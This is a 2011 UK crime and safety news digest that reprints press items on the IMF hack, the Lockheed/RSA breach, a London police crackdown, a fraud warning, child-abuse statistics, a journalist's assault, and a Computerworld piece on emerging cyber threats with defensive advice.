The IMF, which holds sensitive economic data about many countries, said its operations were fully functional.

The cyber attack took place over several months, and happened before former IMF chief Dominique Strauss-Kahn was arrested over sexual assault charges.

"I can confirm that we are investigating an incident," said spokesman David Hawley. "I am not in a position to elaborate further on the extent of the cyber security incident."

The New York Times said IMF staff had been told of the intrusion on Wednesday by e-mail, but that the Fund had not made a public announcement. The e-mail warned that "suspicious file transfers" had been detected and that an investigation had shown a desktop at the Fund had been "compromised and used to access some Fund systems".

There was "no reason to believe that any personal information was sought for fraud purposes," it said.

High profile breaches
 
A cyber security expert told Reuters the infiltration had been a targeted attack which installed software designed to give a nation state a "digital insider presence" at the IMF.

"The code was developed and released for this purpose," said Tom Kellerman, who has worked for the Fund.

Bloomberg quoted an unnamed security expert as saying the hackers were connected to a foreign government. However, such attacks are very difficult to trace.

The World Bank said it briefly cut its network connection with the Fund out "an abundance of caution".

"The World Bank Group, like any other large organisation, is increasingly aware of potential threats to the security of our information system and we are constantly working to improve our defences," said spokesman Rich Mills.

The incident is the latest in a string of high-profile cyber security breaches.

In April, the Sony Playstation network was shut down after hackers stole the personal data of about 100 million accounts and in May, US defence firm Lockheed Martin said it had come under a significant cyber-attack.

CIA Director Leon Panetta told the US Congress earlier this week that a large-scale cyber attack while would cripples power, finance, security and governmental systems was "a real possibility in today's world".

Analysis
(Rory Cellan-Jones, Technology correspondent BBC News

The IMF is saying very little, beyond confirming that an incident has taken place, but on the face of it this looks like a serious attack on computer systems holding some very sensitive data.

The fact that the FBI has been called in, and that the neighbouring World Bank has severed its computer link to the IMF, show that it is being taken seriously.

An internal memo suggests that one particular desktop has been compromised - and security experts are speculating that an individual has been targeted with an email containing malware.

That could have enabled the attacker to gain access to the IMF's systems. What is not clear is whether any data was lost.

For an organisation already in crisis as it looks for a successor to Dominique Strauss-Kahn, the cyber-attack is yet another challenge. The IMF's members will be urgently seeking assurance that their data is secure and that the fund's defences are in good order.

(12th June 2011)


 

MET TARGETS CRIME IN HUGE CRACKDOWN
(Courtesy of Metropolitan Police, dated 8th June 2011)
www.met.police.uk

A major new crackdown by the Metropolitan Police Service against robbers, burglars and violent criminals has begun today.

Operation Target, which is one of the most significant initiatives of its kind ever conducted by the MPS is a renewed drive to tackle crime against people and property in London leading to significant, long term reductions.

"Operation Target is to be the largest and sustained crackdown against crimes such as robbery, burglary and violence ever conducted by the MPS."

As at 15:00hrs, on 8 June 2011 there have been:

- 163 operations across London

- 38 arrests on suspicion of offences including possession of firearms, burglary, supply of drugs, public order and theft. Three sawn off shotguns and a revolver recovered.

- 100 mobile phones found at one address.

- 70 to 100 cannabis plants found in a south London borough.

The sustained campaign, which kicks off today with a series of operational activities, increased patrols and enforcements, brings together all the Met's specialist resources, skills and people to support local police tackle crime and anti-social behaviour, allowing the public to go about their daily lives feeling more confident and safe.

Specialist MPS teams, such as the Flying Squad, Traffic and Mounted Branch will be supporting borough policing units to deliver the operation. Covert and overt tactics, and intelligence-led interventions will be used. Specialist investigation teams will help trace and arrest wanted or suspected robbers and burglars, while increased presence on the streets will be achieved through extra uniformed patrols at key areas.

Analysis shows the initial 'Target' areas, while geographically making up just 2% of London, constitute around nearly a third of all London's street robberies and most serious violence; 15% of residential burglaries and 20% of non-res burglaries.

As well as achieving immediate crime reductions, the operation intends to embed a number of effective long term crime prevention strategies to ensure there is sustained crime reduction in these areas. The overall result will be an improvement in public confidence and feelings of safety in the targeted areas.

Assistant Commissioner Ian McPherson, head of Territorial Policing for the MPS said: "The MPS is here for London, and to help keep communities safe we are enhancing our efforts to tackle crimes against people and property.

"Operation Target is to be the largest and sustained crackdown against crimes such as robbery, burglary and violence ever conducted by the MPS. While robbery and burglary are still relatively low in comparison to previous years we are determined to cut these offences further.

"The public can support this operation and help themselves from becoming a victim of crime by taking some basic prevention measures.

"By bringing together borough based knowledge and expertise with the skills of our specialist units we will make a real and sustainable difference, allowing people to go about their daily lives feeling more confident and safe."

The officer leading Operation Target, Commander Maxine de Brunner added: "Target is a long-term drive to reduce crime and keep it down. The operation is due to last for at least six months and will see the relentless deployment of our specialist assets, resources, tactics and skills in areas which suffer disproportionate levels of crime and anti-social behaviour."

The Mayor of London, Boris Johnson said: "We're cracking down on the perilous criminality that can devastate people's everyday lives and there is no room for complacency. Burglars, robbers and drug dealers should take heed as their crime funded life styles may soon be ending. I've seen first hand today the immense hard work that goes into carrying out policing operations and I have every confidence that Target will be a complete success. The raids this morning will have an immediate effect on the hundreds of local residents who have been living under a cloud of fear."

The public can find out more and get crime prevention advice by contacting their local Safer Neighbourhood Team.

Targeted boroughs ( Information from www.bbc.co.uk )

Havering
Barking and Dagenham
Newham
Greenwich
Tower Hamlets
Lewisham
Southwark
Lambeth
Croydon
Kingston
Hammersmith and Fulham
Southall
Westminster
Brent
Camden
Enfield
Haringey
Waltham Forest

(12th June 2011)


 

CITY POLICE USED IN ADVANCED-FEE FRAUD WARNING
(City of London Police, dated 7th June 2011)
www.cityoflondon.police.uk

City of London Police is reminding the public of the dangers of advanced-fee fraud. The message comes after officers learnt fraudsters have used the force's name to suggest that a lottery scam was legitimate. An email claiming to be from 'Constable John Bruce' 'guaranteed' the competition, and asked for the recipient to confirm their contact details. Detectives believe the fraudster's next step would be to ask for an admin fee to process the prize.

An outdated City of London Police logo and address are used in a bid to make the e-mail seem genuine.

Det Supt Crampton, from the City of London Police Economic Crime Unit, said: "The City of London Police does not endorse lotteries or similar initiatives and would not engage in facilitating distribution of such 'prizes'. Should such correspondence be received treat with extreme caution and forward to the National Fraud Desk for our attention".

If you have received similar emails then please forward them to City of London Police at nfd@cityoflondon.pnn.police.uk.


If you have responded to such correspondence received, have lost money or believe yourself to be a victim of an advance fee fraud then please contact Action Fraud on 0300 123 2040.


NFIB Advice

•Treat unsolicited communication (e-mail, phone & letters) that offer financial gain with extreme suspicion

•Lotteries should not ask for a fee to release your winnings

•Never pay an advance fee

•Do not provide any banking details

•Contact the organisation named using independently sourced contact details, not the details they have supplied to you

•Fraudsters will impersonate large organisation such as banks, government departments or the police in an attempt to give credibility to their scam

(12th June 2011)


 

NEW POLICE DEVICE TO CATCH DRIVERS ON DRUGS
(The Sunday Times, dated 5th June 2011 author Dominic Tobin)
www.thesundaytimes.co.uk  [Note 1]

The new 'drugalyser' devices use improved technology and can detect even low level of drugs in saliva

The first "drugalysers" are expected to be approved for use in police stations by the end of this month, signalling a new crackdown on drivers who take drugs.

The handheld machines, currently being reviewed by the Home Office, will be able to detect a range of substances including amphetamines, cannabis, cocaine, crack, methadone, ecstasy, crystal meth and opiates such as heroin.

Improved technology means that testing devices can now detect even low levels of drugs in saliva. One of the machines under review by the Home Office is the DDS made by Concateno, an Oxfordshire-based company that already supplies devices to police in Italy and Australia.

The machine analyses saliva from a swab that has been rolled around the gum, tongue and inside cheek of a suspect. This is mixed with a fluid and tested on the machine. The result, which flashes up on an LCD screen, is sufficient to justify a mandatory blood or urine test.

If approved, the devices could be in use in police stations by the end of this year. Roadside use by police patrols is likely to follow after further approval, substantially increasing the numbers of prosecutions.

Mike Penning, the road safety minister, said: "Drug-drivers put the lives of responsible motorists at risk and we are determined to ensure the police have everything they need to tackle this menace. We have taken urgent action and intend drug-screening devices to be available for use in police stations this year, making it easier for offenders to be brought to justice."

At present, motorists stopped by police on suspicion of driving under the influence of drink or drugs are first breathalysed for alcohol. If this proves negative, the driver may be taken through an "impairment test" involving tasks such as standing on one leg, walking in a straight line or touching their own nose.

A driver suspected of being impaired through drugs will be taken to the police station and a doctor will be called to give a medical opinion on the cause before a blood or urine sample is taken. The drugalyser cuts out the need for a doctor because it provides sufficient preliminary evidence that the driver is impaired through drugs. Each drugalyser test costs about £15.

In 2008 there were 253 prosecutions for drug-driving in Britain, compared with 73,000 for drink-driving, but the relatively small number of drug-related prosecutions is thought not to reflect the extent of the problem. A European Union study in 2005 suggested that almost 11% of 1,300 drivers stopped in Glasgow were drug users.

The government is considering new legislation imposing limits on drug levels that would eliminate the need for police to prove impairment. Alcohol is the only drug for which there is a legal blood limit.

"We are also considering a new offence of driving with specified drugs in your system but this is a complex medical area and requires detailed examination," said a spokesman.

One problem for ministers in drafting a law is deciding what levels of drugs in the blood cause impairment and how to set legal limits. To do so in the case of prohibited substances would imply that there is an acceptable level of use. On the other hand, imposing zero tolerance, with no traces of drugs permitted, could mean innocent people getting caught up in the ban through accidental intake or because of confusion with prescription drugs.

"Setting a level at which a drug can affect driving is difficult and that is why countries such as Sweden have zero tolerance," said Mike Scott-Ham, principal scientist at the Forensic Science Service (FSS), which carries out about 3,000 blood tests a year on motorists.

The FSS uses gas chromatography mass spectrometry to separate and identify the chemicals in blood. Scientists look for unique ingredients that make up each one to try to avoid as far as possible confusing them with legal medicines. THC, the active ingredient in cannabis, indicates use of the drug. Monoacetylmorphine indicates recent use of heroin; it is formed as the drug breaks down. Benzoylecgonine is created as the body breaks down cocaine

(7th June 2011)


 

TEXT ALERT ! YOUR TOAST IS ON FIRE :(
(The Sunday Times, dated 5th June 2011 author Matt Bingham )
www.thesundaytimes.co.uk  [Note 1]

This smoke alarm doesn't simply let off an ear-splitting shriek when you burn the toast - it also sends a text message alert to up to four separate numbers. It's a feature that to date has only been available on alarms offered as part of home security systems costing hundreds of pounds. The Firetext is both cheaper and, being battery operated, doesn't have to be wired to the mains, so doesn't run the risk of failing should a fire knock out the supply.

The texts are sent using a Sim card built into the device (it's pay-as-you-go but needs a £10 minimum top-up; texts cost 4p each). During setup you can specify four mobile phone numbers, located anywhere in the world, that will receive an alert should the alarm be activated.

The system could bring peace of mind, not just for homeowners worried about leaving their premises empty, but for anyone with elderly, infirm or hard-of-hearing relatives who might not hear or react to the alarm. In an ideal world, one of the numbers would be for a message alert system with the nearest fire brigade; the device is currently being tested with Hertfordshire fire and rescue services for just such a tie-up.

The Firetext, which was developed with the help of a £50,000 prize awarded last year by Barclays Bank in a competition to find innovative new enterprises, takes a standard 9V lithium battery - enough for at least 36 activations, or a life of between two and four years. The device is currently only available to buy online, with post and packing to any UK address costing an additional £5.

Unit cost : £89
Company website : http://firetext.me  [Note 1]

Disclaimer

The uware.org.uk website does not endorse this product or the company mentioned in this article. The product appears to be useful and includes an innovative idea, but any potential purchaser should check to see if it will meet their requirements. These checks should include whether there have been any endorsements from UK Fire Services. As of todays date, the Firetext website does not appear to declare whether their product meets BSI requirements (no kitemark ).

Important

A perfectly adequate smoke alarm which meets BSI requirements costs less than a MacDonalds meal or 4 bottles of Cola. Once you get one, follow the manufacturers guidance on regularly testing it and remember the batteries normally don't last forever !

(7th June 2011)


 


CYBERCRIME COMPLACENCY NO LAUGHING MATTER
(The Guardian, dated 1st June 2011 author Nick Hopkins)
www.guardian.co.uk   [Note 1]

Scotland Yard launches 'cyber flying squad' as British public warned to be more alert to online criminality.

The British public needs to snap out of its complacency about cybercrime or risk becoming victim to increasingly sophisticated criminal networks that are operating online, the head of the country's e-crime unit has warned.

Janet Williams, who takes the lead on cybercrime at the Association of Chief Police Officers, said people seemed to think that being technophobic was quaint and slightly comical.

She was drumming into her detectives that this was no longer acceptable and that the public needed to change its way of thinking too, she said.

"What worries me is that people still think of cybercrime and cyber-attacks as being a little bit like maths. If you go to a dinner party, someone might say that they don't really get maths and everyone laughs and titters. "Not being able to understand it is the equivalent of not being able to read.

"It is unacceptable now and on that basis I have been saying to detectives that if they don't understand what is happening with cybercrime then they shouldn't be a detective. I really mean that."

Williams added: "Most of my working life has been in CID and counter-terrorism. I don't think that in the future detectives will be equipped to be able to deal with these things if they don't understand the nature of cybercrime and I think that multinational organisations, public and private organisations, need to ensure that they understand the threats to their organisation."

Asked whether she thought the public also needed to make more effort to understand the dangers, she replied: "Absolutely."

Williams, one of the most senior officers at Scotland Yard, said business leaders should be ensuring that their firms were properly protected against the theft of valuable intellectual property. "Chief executive officers need to be personally reassured the controls and protections are in place. Intellectual property rights are very important to the UK."

She said she was particularly concerned that industry and universities had not completely understood the new landscape. "[They] need to think it through. I don't think there is sufficient appreciation of the risks," she said.

Williams has set up a "cyber flying squad" based at Scotland Yard, and said her team of 35 detectives and specialists were having significant success.

But she conceded that she needed the help of some of the biggest multinational corporations. Most had sophisticated cyber defences and the ability to track criminals around the world. In many cases, she said, "their intelligence systems are better than ours".

Williams has asked the Home Office to consider pressing for changes to the system of commission rogatoires - the letters of request for legal or judicial assistance sent by one country to another.

With online criminals able to move across borders in the blink of an eye, police have found that the traditional ways of seeking assistance from other countries are outdated.

"We have made recommendations to the Home Office," Williams said. "We have outlined the nature of the problem. But it is up to them to find a solution."

During last week's visit by the US president, Barack Obama, the UK ratified the Budapest convention on cybercrime, which should speed up investigations in some European countries and the US.

Reliable figures about the scale of crime online are difficult to assess, but GCHQ, the government communications headquarters at Cheltenham, estimates that "a figure well into billions" is credible.

One study earlier this year estimated that cybercrime costs the UK more than £27bn a year.

Police know of hundreds of hacking forums, on which thousands of stolen UK credit card details are available for sale for as little as £1.50.

Whitehall officials said that there was a "noticeable spike" in the use of such forums on Friday and Saturday nights, possibly because people returning home from an evening out might have their guard down and were surfing sites they would otherwise ignore.

(2nd June 2011)


 

FREEPHONE FOR TRAFFICKING VICTIMS
(BBC News, dated 1st June 2011)
www.bbc.co.uk
A free phone line for the victims of human trafficking has been launched.

The Metropolitan Police Service wants people who have been brought to the UK and forced to work for little or no wages to report the crimes.

The number is featured in a poster campaign produced for the force and the charity Stop The Traffik.

The force's SCD9 unit, which fights human exploitation, has secured 12 convictions in 12 months and a further 20 people are awaiting trial.

Det Ch Supt Richard Martin, head of SCD9, said: "I hope that this poster and the freephone number it shows will encourage and enable victims who are suffering at the hands of traffickers to get in touch with us.

"Since SCD9 was formed in April last year, we have been working to raise awareness and understanding of all aspects of human trafficking, including trafficking for sexual exploitation and trafficking in the context of domestic servitude and forced labour."

Freephone Number : 0800 783 2589

(2nd June 2011)



NSPCC SAYS CHILD SEX ABUSE HAS RISEN TO 64 CRIMES A DAY
(BBC News, dated 26th May 2011)
www.bbc.co.uk

 

At least 64 children are sexually abused every day in England and Wales, figures obtained by the NSPCC suggest.

More than 23,000 offences - including rape, incest and gross indecency - were recorded by police in 2009-10, an 8% increase on 2008-9, the charity said.

For the first time, its research also looked at the age of abusers and found a quarter were aged under 18. One in four victims was aged 11 or under.

The Home Office said the figures were "appalling".

The figures for recorded sex crimes against children were obtained through a successful NSPCC freedom of information request to all 43 police forces in England and Wales.

The figures showed that more than half of the victims were aged between 12 and 15, one in four was aged five to 11, and more than 1,000 were aged four or younger.

Girls were more than six times more likely to be assaulted than boys, with 86% of attacks taking place against females, the figures showed.

The police force reporting the largest number of crimes was London's Metropolitan (3,672), followed by West Midlands (1,531) and West Yorkshire (1,205).

Jon Brown, who heads the NSPCC's work on child sex abuse, said the increase was a "real concern".

"Thousands of people come forward every year to report sex crimes against children. But many victims are too young to ask for help. Others are too scared to tell anyone about their suffering until years later," he said.

"More than 2,000 suspects in these cases were under 18. It's clear we need more services that address the harmful sexual behaviour of young people, as well as adult offenders."

'Dark places'
 
The Association of Chief Police Officers (Acpo) warned that recorded crime figures were "not a good indicator of the prevalence or trends of child sexual abuse" as much abuse went unreported and rises could be attributable to victims of historic abuse coming forward.

However, Assistant Chief Constable Peter Davies, the Acpo lead for child protection and child abuse investigation, said: "Understanding the crime though is central to success.

"We are starting to bring it out of the dark places where victims suffer in silence for fear of reporting while recent infiltration of intricate global paedophile networks is further testament to the work we have collectively done to understand how offenders think and operate."

A Home Office spokesman said the government would continue to work with groups like the NSPCC to protect the most vulnerable people in our society.

It pointed to the roll-out of the child sex offender disclosure scheme across police forces in England and Wales earlier this year.

This allows parents to check whether someone in contact with their child is a convicted sex offender.

Dubbed "Sarah's Law", it was proposed after the murder of eight-year-old Sarah Payne by a convicted sex offender, Roy Whiting, in West Sussex in 2000.

The Home Office said this was a "major step forward in our ability to protect children from sex offenders".
National Society for the Prevention of Cruelty to Children : www.nspcc.org.uk

Barnardo's : www.barnardos.org.uk

(1st June 2011)



METROPOLITAN POLICE LOOK AT CLOSING STATION FRONT DESKS
(BBC News, dated 30th May 2011)
www.bbc.co.uk

 

The Metropolitan Police is considering closing down some of London's 138 front counters - the first port of call in most police stations - in an attempt to save money.

It is proposing a minimum of one front counter per borough, staffed 24-hours-a-day, seven days a week.

But critics say reducing the number of front counters would make it more difficult for people to report crime. No decisions will be made until a public consultation is completed.

The Met is reviewing the use of front counters as part of a wider analysis into how the public contact the police - whether face-to-face or using telephone and online methods.

It says there has been a reduction in the reporting of crime via front counters.

According to the Met last year approximately 14% of crimes were reported in this way, while 66% were by phone.

'Place of safety'
 
Commander Tony Eastaugh said: "Some of our front counters hark back to a different era.

"We now have 630 Safer Neighbourhood Teams, we have surgeries, we have different mechanisms for engagement of police at a local level."

But critics fear it is a cost-cutting exercise which will remove a valuable resource from communities.

Richard Moore, chairman of a Safer Neighbourhood Panel in Lambeth, said: "The first purpose of any police station is to be a place of safety.

"That blue lamp is recognised throughout the world and if somebody's in trouble that is where they're going to want to go.

"They do not want to find a police station is closed and it's only open part time."

But Liberal Democrat London Assembly member Caroline Pidgeon said: "Evidence has shown members from black and minority ethnic communities and older people who like to go and report things in person.

"If there's only one front counter in every borough they won't be able to get there and I fear lots of crimes won't be reported."

The Met is running an online survey into the way people access the police until midnight on 30 May but a wider public consultation will continue into the summer.

No decisions about changes to the number of front counters will be taken until this is completed.

(1st June 2011)




HACKERS BEAT LOCKHEAD DEFENCES
(Sunday Times - Business, dated 29th May 2011 author Karl West)
www.thetimes.co.uk  [Note 1] 

Hackers have penetrated the security networks of the world's biggest defence company, Lockheed Martin, sparking fears that other groups' systems may have been breached.
The intruders are thought to have created duplicates to electronic keys made by an American technology group, EMC Corporation. Its security division, RSA, was hit by a sophisticated attack in March.

RSA's electronic keys enable company employees to log into their computer network securely when they are out of the office. Its technology is used by most Fortune 500 companies and federal agencies in America. The website also cites case studies from Rolls-Royce and Bentley cars, Staffordshire police, the French ministry of education, Virgin Blue, the airline, and the Bedfordshire and Luton fire and rescue service.

Lockheed produces some of the most advanced military hardware in the world, including the F-35 Joint Strike Fighter, F-22 Raptor and is a significant contractor on America's nuclear weapons programme.
Reports suggest Lockheed has temporarily disabled remote access and sent 90,000 replacement keys to staff. Employees were also told to reset all passwords as a precaution.
Sources said military contractors typically do not keep classified data on computers that can be accessed remotely. Other defence groups use the keys sold under the SecurlD brand and the Pentagon confirmed it also uses a limited number.

Raytheon, a top-five US defence group, said it took immediate company-wide action when the RSA breach emerged. It said: "As a result of these actions, we prevented a widespread disruption of our network."
Boeing said it had a "wide range" of systems in place to detect and prevent network intrusions.
SecurlD keys generate a string of digits that users must enter along with a secret identification number before they can access their com¬pany's computer network remotely. If a user fails to enter the string correctly before it expires, then access is denied.

(1st June 2011)


 


LARA LOGAN - "THEY RAPED ME WITH THEIR HANDS"
(The Times, dated 30th April 2011 author Anne Barrowclough)
www.thetimes.co.uk  [Note 1]

For 40 minutes at the height of the Egyptian revolution, the TV journalist Lara Logan thought that she was going to die as she was violently molested by a mob of up to 300 men, she has disclosed.

Logan, a former GMTV reporter, described for the first time her ordeal in Tahrir Square, Cairo, on the night of President Mubarak's resignation two months ago. The 60 Minutes interview will be broadcast in the US tomorrow.

She and her colleagues were filming what they thought were jubilant crowds when "everything went wrong", she said. Her Arabic-speaking cameraman heard onlookers talking about removing her trousers, and urged the crew to leave, she said, but by then it was too late. Set on by a horde of between 200 and 300 men, she was stripped, beaten and abused for more than half an hour.

"My clothes were ripped to pieces," she said. "For an extended period they raped me with their hands. What really struck me was how merciless they were. They really enjoyed my pain and suffering. I thought, 'Not only am I going to die here, but it's going to be just a torturous death that's going to go on for ever and ever'."

Logan was eventually pulled from the crowd by Egyptian soldiers after a group of women raised the alarm. She was flown out of Egypt within two hours on board a chartered jet. On her return to the US, she spent four days in hospital and was telephoned by President Obama.

Her decision to talk about her ordeal was motivated by a desire to draw attention to the dangers faced by female journalists, especially in countries that discriminate against women. Where women are denied equality, "public spaces don't belong to them", she said.

Logan, 40, was born in Durban, South Africa, and lives in Washington with her second husband, a Texan defence contractor. They have two young children. She returned to work on Wednesday and has said that she will continue to report from war zones - but not, for the time being, from the Middle East.


 

Editors Note

Try and obtain details of the levels and types of crime that occur in countries that you are planning to visit.
In the Travel section of this website, the extracts of safety advice provided by some guide books appear to state that female travellers should seek companionship of local women in Egypt. In this story it was the action of Egyptian Women who appears to have saved Lara's life.

Your main source of information for foreign travel should be the Foreign and Commonwealth Office website :
www.fco.gov.uk

(1st June 2011)


 


SIX RISING THREATS FROM CYBERCRIMINALS
(Computerworld, dated 19th May 2011 author John Brandon)
www.computerworld.com  [Note 1]

The following is an extract, for original article  [Note 1]: http://cwonline.computerworld.com/t/7347400/930454165/512742/0/

Whether you're an IT manager protecting employees and corporate systems or you're simply trying to keep your own personal data safe, these threats (some rapidly growing, others still emerging) pose a potential risk.

Fortunately, there are some security procedures and tools available to help you win the fight against the bad guys. For all the other threats we've covered in this story, taking some extra precautions, such as using strong encryption technology, engaging only with trusted friends on social networks, and using penetration testing software on corporate networks can help alleviate some fears, even if the bad guys keep coming up with new ways to make us nervous.

1. Text-message malware

While smartphone viruses are still fairly rare, text-messaging attacks are becoming more common, according to Rodney Joffe, senior vice president and senior technologist at mobile messaging company Neustar and director of the Conficker Working Group coalition of security researchers. PCs are now fairly well protected, he says, so some black-hat hackers have moved on to mobile devices. Their incentive is mostly financial; text messaging provides a way for them to break in and make money.

Khoi Nguyen, group product manager for mobile security at Symantec, confirmed that text-message attacks aimed at smartphone operating systems are becoming more common as people rely more on mobile devices. It's not just consumers who are at risk from these attacks, he adds. Any employee who falls for a text-message ruse using a company smartphone can jeopardize the business's network and data, and perhaps cause a compliance violation.

"This is a similar type of attack as [is used on] a computer -- an SMS or MMS message that includes an attachment, disguised as a funny or sexy picture, which asks the user to open it," Nguyen explains. "Once they download the picture, it will install malware on the device. Once loaded, it would acquire access privileges, and it spreads through contacts on the phone, [who] would then get a message from that user."

In this way, says Joffe, hackers create botnets for sending text-message spam with links to a product the hacker is selling, usually charging you per message. In some cases, he adds, the malware even starts buying ring tones that are charged on your wireless bill, lining the pocketbook of the hacker selling the ring tones.

Another ruse, says Nguyen, is a text-message link to download an app that supposedly allows free Internet access but is actually a Trojan that sends hundreds of thousands of SMS messages (usually at "premium SMS" rates of $2 each) from the phone.

Wireless carriers say they do try to stave off the attacks. For instance, Verizon spokeswoman Brenda Raney says the company scans for known malware attacks and isolates them on the cellular network, and even engages with federal crime units to block attacks.

Still, as Joffe notes jokingly, there is "no defense against being stupid" or against employee errors. For example, he recounts that he and other security professionals training corporate employees one-on-one about cell phone dangers would send them messages with a fake worm. And right after the training session, he says, many employees would still click the link.

To keep such malware off users' phones, Joffe recommends that businesses institute strict corporate policies limiting whom employees can text using company networks and phones, and what kind of work can be done via text. Another option is a policy that disallows text messaging entirely, at least until the industry figures out how to deal with the threats.

For consumers, common sense is the best defense. Avoid clicking on text-message links or attachments from anyone you don't know, and use extreme caution even with messages from known contacts, who might unwittingly be part of a botnet.


2. Hacking into smart grids ( operational within the US, but coming to the UK soon )

A common misconception is that only an open network -- say, your corporate wireless LAN for visitor access -- is hackable. Not true, says Justin Morehouse, a principal consultant at Stratum Security who spoke about network security at last year's DefCon security conference. Morehouse says it's actually not that difficult to find an access point into a so-called closed system.

For example, the Stuxnet worm last year infected tens of thousands of Windows PCs running Siemens SCADA systems in manufacturing and utility companies, most notably in Iran, and it was largely spread via infected USB flash drives. Even some nuclear plants and power grids have wireless networks for employees to use.

"Stuxnet proved that it is relatively simple to cause potentially catastrophic damage" to an industrial control network, says Neustar's Joffe.

According to Morehouse, another new attack point will be smart grids, which use electronic metering to streamline power management. Utility companies around the world have begun testing and rolling out smart meters to customers' homes and businesses. The technology, which can send data to and receive it from a central system, can also be very helpful for IT: You can open a console to see the power usage for one section of a building, for example.

But smart grids might be vulnerable to attacks that would allow nefarious hackers to cut off electricity to homes and businesses and create other kinds of havoc. One possible attack vector is a smart grid's communications infrastructure. For example, Morehouse says, a German utility company called Yello Strom uses a consumer smart grid system that works like a home automation kit -- the sensors report energy usage back to the central server via the user's home Wi-Fi network.

Because of this, Morehouse says, it is possible for end users to tap into their own networks and gain access to the substation used for delivering power. "Often it's the case that these types of networks are not properly segmented or protected," he says. "Once in, the attacker may be treated as a trusted user and have access to other areas. Is there the potential that they could disrupt the substation or city? Absolutely. They may plant a back door that could allow the grid to be powered down at a particular time."

Another concern is vulnerabilities in the smart meters themselves -- a problem that affects corporate smart grids as well. Researchers from Seattle-based security services vendor IOActive, for instance, discovered several bugs in smart grid devices that criminal hackers could exploit to access the smart grid network and cut power to customers.

"Hackers use press releases to find out the technologies [used in corporate smart grids] and go back to the infrastructure and find vulnerabilities. So, for example, if Wal-Mart announces a smart grid using Siemens technology, a hacker suddenly has many of the answers they need to find that controller and break in," Morehouse says.

The most effective preventive measure, says Morehouse, is rigid isolation; a smart grid should not touch any other network, ever. He says there is an urgent need for penetration testing and making sure the firewall in a closed network is secure because of the possible dangers of gaining access to the power grid. He advises using tools such as Core Impact and Metasploit.

The "rigid isolation" rule applies to home users as well. "Consumers should never bridge smart grid networks with their home networks," says Morehouse. He also advises home users to become familiar with their smart meters so they can recognize whether they have been tampered with, and to ask their utility providers what security measures are in place to protect the meters and network.

3. Social network account spoofing

Many of us use Facebook, LinkedIn and other social networks to connect with friends, family and colleagues -- which leaves us vulnerable to a new technique called social network account spoofing. The idea is that a scammer poses as either someone you know or a friend of a friend to get close to you and fool you into revealing personal information. He then uses that information to gain access to your other accounts and eventually steal your identity.

someone contacts you on a service like Facebook or LinkedIn, posing as a friend of a friend or a co-worker of someone you trust. Then, the new "friend" contacts you directly, usually through text message or email. It might seem surprising to have this "friend" contact you outside the social network, but he seems legitimate because you believe he has a connection with someone you trust.

In another scenario, a scammer might impersonate someone you already know -- claiming to be an old friend from high school, for instance. Spoofers can find out your connections by following your public feeds or looking up the names of co-workers on sites like LinkedIn where you have posted your work info.

Once the scammer has established a connection with you, he uses devious means to steal personal data, such as chatting to find out the names of family members, favorite bands, hobbies and other seemingly innocuous information -- then trying those as passwords or answers to security questions at banking sites, webmail accounts or other sites.


What's more, social network attacks are sometimes combined with email and website spoofing, Morehouse says. You might develop a friendship on LinkedIn and then get an email from that person that looks like it was sent via LinkedIn but is actually a fake. When you click the link to reply to the message, you're taken to a fake LinkedIn site; logging in there reveals your LinkedIn username and password to the spoofer.

As with text-message attacks, individuals' best defense against spoofing attacks is to use common sense, Joffe says -- criminals usually do not do a good job of impersonating a person or company, and they tend to send links and phishing scams to con you. They might try to mimic a friend but rarely manage to accurately convey their personality. In some cases, the attacks are traceable through e-mail headers or IP addresses, and most attacks are too general and untargeted to be believable to anyone who's careful.

Other precautions might seem obvious but are often overlooked. If someone says he's a friend of a friend or co-worker, make sure you confirm his identity with your common connection. And it's a good idea to lock down your privacy settings at social networking sites so that your contact info, posts, photos and more aren't visible to everyone. In Facebook, for example, select Account --> Privacy Settings --> Custom and click the "Customize settings" link at the bottom to gain control over exactly what you want to share with everyone, friends of friends, friends only or no one.

4. Cyberstalking

Social networks like Twitter and Facebook have changed the way we communicate in our personal and work lives, many would say for the better. Yet these useful portals also provide conduits that others can use to make our lives miserable.

A relatively new concept variously called cyberstalking, cyberharassment or cyberbullying involves an individual or a group making repeated personal attacks online, such as posting negative comments on every tweet you make or posting crude altered photos of you on a social network. The perpetrators may hide behind online aliases to hide their identities.

Most of us have heard of a handful of well-publicized cases of cyberbullying among teens, but it's also on the rise for adults who connect to social networks from their place of employment, according to Kathleen Baty, a personal safety consultant and CEO of SafetyChick Enterprises. These workplace-related attacks might involve another employee, or someone trying to steal company information.

"Cyberstalking in the workplace has become more and more common and is tough to define because there are so many different forms to threaten or harass in this digital world and so many different motives behind the behavior. It can be anything from a personal/romantic relationship gone bad, to a co-worker/business conflict, to a competitor trying to wreak havoc on a company," says Baty.

To keep cyberstalkers off company networks, businesses should implement all the usual corporate security tools, such as firewalls and encryption, Baty says. Additionally, companies should institute a social media policy that outlines clear guidelines for what kinds of information employees should and should not post or discuss on public sites.

If you do become a victim of cyberstalking or cyberbullying, Baty advises you to report it immediately to local law-enforcement authorities; if it happens at work, report it to your HR department as well. Don't delete harmful posts or other electronic communications, she says, but instead retain all documentation of incidents, mainly as evidence but also because the headers for e-mail and forum postings can be used to track down the offender.

That said, the best defense is to protect your personal information as carefully as you can. For instance, never reveal online such details as where you live, and don't announce your movements, such as that you are on vacation or home sick and have left your workplace computer open to attack.

5. Hackers controlling your car

The age of the connected car is dawning. Vehicles like the Ford Edge now provide 3G network access, a Wi-Fi router in the car, and the ability to tap into your home Wi-Fi network (only while parked). In the next few years, more automakers will provide wireless access for Web browsing and streaming high-def movies. And by 2013, a new FCC-mandated wireless signal called DSRC (dedicated short-range communications) will run at 5.9GHz and provide a vehicle-to-vehicle communication network.

For anyone who follows network computing or computing in general, adding these new features to a moving vehicle should raise a red flag as yet another way criminal hackers can cause problems. Since these systems often tap into the car diagnostics and safety features, a hacker could potentially interfere with such systems and, for example, cause a car's engine to surge at just the wrong time, says Stephan Tarnutzer, chief operating officer at automotive control console manufacturer DGE.

While no real-world exploits are known to have happened, security researchers from the University of California, San Diego, and the University of Washington have hacked into the computers of several late-model cars and remotely disabled the brakes, altered the speedometer reading, turned off the engine, locked passengers into the car and more.

The research team's initial tests relied on plugging a laptop into the car's diagnostic system, but later tests identified other entry points for an attack, including the cars' Bluetooth and cellular connections. More wireless communications in future cars will create even more attack vectors.

The good news, Tarnutzer says, is that most of the forthcoming wireless technology for cars is for short-range communications, from one lane to another or just as you pass through an intersection. That makes it difficult for hackers because they need to be in close proximity to the car.

